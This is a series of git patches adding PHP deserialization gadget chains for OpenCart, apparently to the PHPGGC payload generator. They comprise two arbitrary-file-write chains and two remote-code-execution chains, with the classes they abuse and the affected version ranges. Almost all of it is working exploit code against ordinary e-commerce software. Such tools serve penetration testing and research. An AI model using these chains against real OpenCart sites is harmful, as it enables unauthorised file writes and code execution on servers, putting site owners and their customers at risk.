From 68f1afece5636f1b30e3c73ba9067e5eb3ff4d89 Mon Sep 17 00:00:00 2001
From: mcdruid <drew@mcdruid.co.uk>
Date: Mon, 25 Nov 2024 20:30:48 +0000
Subject: [PATCH 1/7] OpenCart/FW1

---
 gadgetchains/OpenCart/FW/1/chain.php   | 23 ++++++++++++++++
 gadgetchains/OpenCart/FW/1/gadgets.php | 38 ++++++++++++++++++++++++++
 2 files changed, 61 insertions(+)
 create mode 100644 gadgetchains/OpenCart/FW/1/chain.php
 create mode 100644 gadgetchains/OpenCart/FW/1/gadgets.php

diff --git a/gadgetchains/OpenCart/FW/1/chain.php b/gadgetchains/OpenCart/FW/1/chain.php
new file mode 100644
index 00000000..3e43c7dd
--- /dev/null
+++ b/gadgetchains/OpenCart/FW/1/chain.php
@@ -0,0 +1,23 @@
+<?php
+
+namespace GadgetChain\OpenCart;
+
+class FW1 extends \PHPGGC\GadgetChain\FileWrite
+{
+    public static $version = '4.0.0.0 <= 4.0.2.3+';
+    public static $vector = '__destruct';
+    public static $author = 'mcdruid';
+
+    public function generate(array $parameters)
+    {
+        $path = $parameters['remote_path'];
+        $data = $parameters['data'];
+
+        return new \Opencart\System\Library\DB\MySQLi(
+            new \Opencart\System\Library\Session(
+                new \Opencart\System\Library\Log($path),
+                $data
+            )
+        );
+    }
+}
\ No newline at end of file
diff --git a/gadgetchains/OpenCart/FW/1/gadgets.php b/gadgetchains/OpenCart/FW/1/gadgets.php
new file mode 100644
index 00000000..36115128
--- /dev/null
+++ b/gadgetchains/OpenCart/FW/1/gadgets.php
@@ -0,0 +1,38 @@
+<?php
+
+namespace Opencart\System\Library\DB
+{
+    class MySQLi
+    {
+        private object|null $connection;
+
+        function __construct($connection)
+        {
+            $this->connection = $connection;
+        }
+    }
+}
+
+namespace Opencart\System\Library
+{
+    class Session
+    {
+        protected object $adaptor;
+        protected string $session_id;
+
+        public function __construct($adaptor, $session_id)
+        {
+            $this->adaptor = $adaptor;
+            $this->session_id = $session_id;
+        }
+    }
+
+    class Log
+    {
+        private string $file;
+
+        public function __construct($file) {
+            $this->file = $file;
+        }
+    }
+}

From 699ab0e5cde174d9e77bd758aab21727ff7ebb1a Mon Sep 17 00:00:00 2001
From: mcdruid <drew@mcdruid.co.uk>
Date: Sat, 7 Dec 2024 10:36:33 +0000
Subject: [PATCH 2/7] OpenCart/FW2

---
 gadgetchains/OpenCart/FW/2/chain.php   | 28 +++++++++++++++++
 gadgetchains/OpenCart/FW/2/gadgets.php | 43 ++++++++++++++++++++++++++
 2 files changed, 71 insertions(+)
 create mode 100644 gadgetchains/OpenCart/FW/2/chain.php
 create mode 100644 gadgetchains/OpenCart/FW/2/gadgets.php

diff --git a/gadgetchains/OpenCart/FW/2/chain.php b/gadgetchains/OpenCart/FW/2/chain.php
new file mode 100644
index 00000000..e076fa97
--- /dev/null
+++ b/gadgetchains/OpenCart/FW/2/chain.php
@@ -0,0 +1,28 @@
+<?php
+
+namespace GadgetChain\OpenCart;
+
+class FW2 extends \PHPGGC\GadgetChain\FileWrite
+{
+    public static $version = '3.0.3.5 <= 3.0.4.0+';
+    public static $vector = '__destruct';
+    public static $author = 'mcdruid';
+    public static $information = '
+      https://seclists.org/fulldisclosure/2022/May/30 describes a Gadget Chain
+      using the Twig_Cache_Filesystem class, presumably in an older release.';
+
+    public function generate(array $parameters)
+    {
+        $path = $parameters['remote_path'];
+        $data = $parameters['data'];
+
+        return new \DB\MySQLi(
+            new \Session(
+                // new \Twig_Cache_Filesystem(), // OpenCart 3.0.3.3 or older.
+                new \Twig\Cache\FilesystemCache(),
+                $path,
+                $data
+            )
+        );
+    }
+}
diff --git a/gadgetchains/OpenCart/FW/2/gadgets.php b/gadgetchains/OpenCart/FW/2/gadgets.php
new file mode 100644
index 00000000..ba83d249
--- /dev/null
+++ b/gadgetchains/OpenCart/FW/2/gadgets.php
@@ -0,0 +1,43 @@
+<?php
+
+namespace DB
+{
+    class MySQLi
+    {
+        private object|null $connection;
+
+        function __construct($connection)
+        {
+            $this->connection = $connection;
+        }
+    }
+}
+
+namespace {
+    class Session
+    {
+        protected object $adaptor;
+        protected string $session_id;
+        public $data;
+
+        public function __construct($adaptor, $session_id, $data)
+        {
+            $this->adaptor = $adaptor;
+            $this->session_id = $session_id;
+            $this->data = $data;
+        }
+    }
+
+    class Twig_Cache_Filesystem
+    {
+        // for OpenCart 3.0.3.3 or older.
+    }
+}
+
+namespace Twig\Cache
+{
+    class FilesystemCache
+    {
+
+    }
+}

From 7bb53b5b44a9093bc90c0d91bff3baeaa67f930b Mon Sep 17 00:00:00 2001
From: mcdruid <drew@mcdruid.co.uk>
Date: Sun, 8 Dec 2024 10:33:20 +0000
Subject: [PATCH 3/7] note about commit that will protect __destruct

---
 gadgetchains/OpenCart/FW/1/chain.php | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/gadgetchains/OpenCart/FW/1/chain.php b/gadgetchains/OpenCart/FW/1/chain.php
index 3e43c7dd..994ae48a 100644
--- a/gadgetchains/OpenCart/FW/1/chain.php
+++ b/gadgetchains/OpenCart/FW/1/chain.php
@@ -7,6 +7,9 @@ class FW1 extends \PHPGGC\GadgetChain\FileWrite
     public static $version = '4.0.0.0 <= 4.0.2.3+';
     public static $vector = '__destruct';
     public static $author = 'mcdruid';
+    public static $information = 'This will stop working when the following:
+    https://github.com/opencart/opencart/commit/087e20dd1cd9b441be5a327fd4b6698744bffb38
+    ..is included in a release.';
 
     public function generate(array $parameters)
     {

From 57e90e04e95a7cb4667f9dbe6049177a0d6268c9 Mon Sep 17 00:00:00 2001
From: mcdruid <drew@mcdruid.co.uk>
Date: Mon, 9 Dec 2024 15:49:13 +0000
Subject: [PATCH 4/7] OpenCart/RCE1

---
 gadgetchains/OpenCart/RCE/1/chain.php   | 26 +++++++++++++++
 gadgetchains/OpenCart/RCE/1/gadgets.php | 42 +++++++++++++++++++++++++
 2 files changed, 68 insertions(+)
 create mode 100644 gadgetchains/OpenCart/RCE/1/chain.php
 create mode 100644 gadgetchains/OpenCart/RCE/1/gadgets.php

diff --git a/gadgetchains/OpenCart/RCE/1/chain.php b/gadgetchains/OpenCart/RCE/1/chain.php
new file mode 100644
index 00000000..77d2fdb8
--- /dev/null
+++ b/gadgetchains/OpenCart/RCE/1/chain.php
@@ -0,0 +1,26 @@
+<?php
+
+namespace GadgetChain\OpenCart;
+
+class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '4.0.0.0 <= 4.0.2.3+';
+    public static $vector = '__destruct';
+    public static $author = 'mcdruid';
+    public static $information = 'This will stop working when the following:
+    https://github.com/opencart/opencart/commit/087e20dd1cd9b441be5a327fd4b6698744bffb38
+    ..is included in a release.';
+
+    public function generate(array $parameters)
+    {
+        $function = $parameters['function'];
+        $parameter = $parameters['parameter'];
+
+        return new \Opencart\System\Library\DB\MySQLi(
+            new \Opencart\System\Library\Session(
+                new \Opencart\System\Engine\Proxy('write', $function),
+                $parameter
+            )
+        );
+    }
+}
\ No newline at end of file
diff --git a/gadgetchains/OpenCart/RCE/1/gadgets.php b/gadgetchains/OpenCart/RCE/1/gadgets.php
new file mode 100644
index 00000000..8f920535
--- /dev/null
+++ b/gadgetchains/OpenCart/RCE/1/gadgets.php
@@ -0,0 +1,42 @@
+<?php
+
+namespace Opencart\System\Library\DB
+{
+    class MySQLi
+    {
+        private object|null $connection;
+
+        function __construct($connection)
+        {
+            $this->connection = $connection;
+        }
+    }
+}
+
+namespace Opencart\System\Library
+{
+    class Session
+    {
+        protected object $adaptor;
+        protected string $session_id;
+
+        public function __construct($adaptor, $session_id)
+        {
+            $this->adaptor = $adaptor;
+            $this->session_id = $session_id;
+        }
+    }
+}
+
+namespace Opencart\System\Engine
+{
+    Class Proxy
+    {
+        protected $data = [];
+
+        public function __construct($key, $function)
+        {
+            $this->data[$key] = $function;
+        }
+    }
+}

From ba36f3200e8bcb62c08f2373e5f398986411784c Mon Sep 17 00:00:00 2001
From: mcdruid <drew@mcdruid.co.uk>
Date: Fri, 4 Apr 2025 15:25:35 +0100
Subject: [PATCH 5/7] fix version details for RCE/1

---
 gadgetchains/OpenCart/RCE/1/chain.php | 7 +++----
 1 file changed, 3 insertions(+), 4 deletions(-)

diff --git a/gadgetchains/OpenCart/RCE/1/chain.php b/gadgetchains/OpenCart/RCE/1/chain.php
index 77d2fdb8..2b4ff8cf 100644
--- a/gadgetchains/OpenCart/RCE/1/chain.php
+++ b/gadgetchains/OpenCart/RCE/1/chain.php
@@ -4,12 +4,11 @@
 
 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
 {
-    public static $version = '4.0.0.0 <= 4.0.2.3+';
+    public static $version = '4.0.0.0 < 4.1.0.0';
     public static $vector = '__destruct';
     public static $author = 'mcdruid';
-    public static $information = 'This will stop working when the following:
-    https://github.com/opencart/opencart/commit/087e20dd1cd9b441be5a327fd4b6698744bffb38
-    ..is included in a release.';
+    public static $information = 'This stopped working when this commit landed:
+    https://github.com/opencart/opencart/commit/087e20dd1cd9b441be5a327fd4b6698744bffb38';
 
     public function generate(array $parameters)
     {

From bc93c89492a6f84e9df0db8ba09f30c766c713c7 Mon Sep 17 00:00:00 2001
From: mcdruid <drew@mcdruid.co.uk>
Date: Fri, 4 Apr 2025 16:10:13 +0100
Subject: [PATCH 6/7] OpenCart/RCE2

---
 gadgetchains/OpenCart/RCE/2/chain.php   | 25 ++++++++++++++
 gadgetchains/OpenCart/RCE/2/gadgets.php | 45 +++++++++++++++++++++++++
 2 files changed, 70 insertions(+)
 create mode 100644 gadgetchains/OpenCart/RCE/2/chain.php
 create mode 100644 gadgetchains/OpenCart/RCE/2/gadgets.php

diff --git a/gadgetchains/OpenCart/RCE/2/chain.php b/gadgetchains/OpenCart/RCE/2/chain.php
new file mode 100644
index 00000000..22c4750c
--- /dev/null
+++ b/gadgetchains/OpenCart/RCE/2/chain.php
@@ -0,0 +1,25 @@
+<?php
+
+namespace GadgetChain\OpenCart;
+
+class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '4.1.0.0 <= 4.1.0.3+';
+    public static $vector = '__destruct';
+    public static $author = 'mcdruid';
+    public static $information = 'This Gadget Chain typically ends up causing
+    errors but not before the payload has been executed.';
+
+    public function generate(array $parameters)
+    {
+        $function = $parameters['function'];
+        $parameter = $parameters['parameter'];
+
+        return new \GuzzleHttp\Handler\CurlFactory(
+          new \Aws\ResultPaginator(
+            new \Opencart\System\Engine\Proxy('getCommand', $function),
+                $parameter
+          ),
+        );
+    }
+}
\ No newline at end of file
diff --git a/gadgetchains/OpenCart/RCE/2/gadgets.php b/gadgetchains/OpenCart/RCE/2/gadgets.php
new file mode 100644
index 00000000..0b86f9b3
--- /dev/null
+++ b/gadgetchains/OpenCart/RCE/2/gadgets.php
@@ -0,0 +1,45 @@
+<?php
+
+namespace Opencart\System\Engine
+{
+    Class Proxy
+    {
+        protected $data = [];
+
+        public function __construct($key, $function)
+        {
+            $this->data[$key] = $function;
+            // It's not essential to define a callback for 'execute' but doing
+            // so delays hitting errors for few more function calls. Using
+            // print_r here may mean you see the return value of the payload.
+            $this->data['execute'] = 'print_r';
+        }
+    }
+}
+
+
+namespace GuzzleHttp\Handler {
+    class CurlFactory {
+        private $handles = [];
+
+        public function __construct($handle) {
+          $this->handles = $handle;
+        }
+    }
+}
+
+namespace Aws {
+    class ResultPaginator {
+        private $client;
+        private $config;
+        private $operation;
+        private $args = [];
+
+        public function __construct($client, $operation) {
+            $this->config['output_token'] = 'foo';
+            $this->client = $client;
+            $this->operation = $operation;
+         }
+    }
+
+}

From 625b553fc9d3ac79493b3bc868c47149348bf445 Mon Sep 17 00:00:00 2001
From: mcdruid <drew@mcdruid.co.uk>
Date: Sun, 6 Apr 2025 17:03:34 +0100
Subject: [PATCH 7/7] indentation fixes, plus make payload tiny bit smaller

---
 gadgetchains/OpenCart/RCE/2/chain.php   | 6 +++---
 gadgetchains/OpenCart/RCE/2/gadgets.php | 4 ++--
 2 files changed, 5 insertions(+), 5 deletions(-)

diff --git a/gadgetchains/OpenCart/RCE/2/chain.php b/gadgetchains/OpenCart/RCE/2/chain.php
index 22c4750c..65240fc5 100644
--- a/gadgetchains/OpenCart/RCE/2/chain.php
+++ b/gadgetchains/OpenCart/RCE/2/chain.php
@@ -16,9 +16,9 @@ public function generate(array $parameters)
         $parameter = $parameters['parameter'];
 
         return new \GuzzleHttp\Handler\CurlFactory(
-          new \Aws\ResultPaginator(
-            new \Opencart\System\Engine\Proxy('getCommand', $function),
-                $parameter
+            new \Aws\ResultPaginator(
+                new \Opencart\System\Engine\Proxy('getCommand', $function),
+                    $parameter
           ),
         );
     }
diff --git a/gadgetchains/OpenCart/RCE/2/gadgets.php b/gadgetchains/OpenCart/RCE/2/gadgets.php
index 0b86f9b3..d4f3b772 100644
--- a/gadgetchains/OpenCart/RCE/2/gadgets.php
+++ b/gadgetchains/OpenCart/RCE/2/gadgets.php
@@ -23,7 +23,7 @@ class CurlFactory {
         private $handles = [];
 
         public function __construct($handle) {
-          $this->handles = $handle;
+            $this->handles = $handle;
         }
     }
 }
@@ -36,7 +36,7 @@ class ResultPaginator {
         private $args = [];
 
         public function __construct($client, $operation) {
-            $this->config['output_token'] = 'foo';
+            $this->config['output_token'] = false;
             $this->client = $client;
             $this->operation = $operation;
          }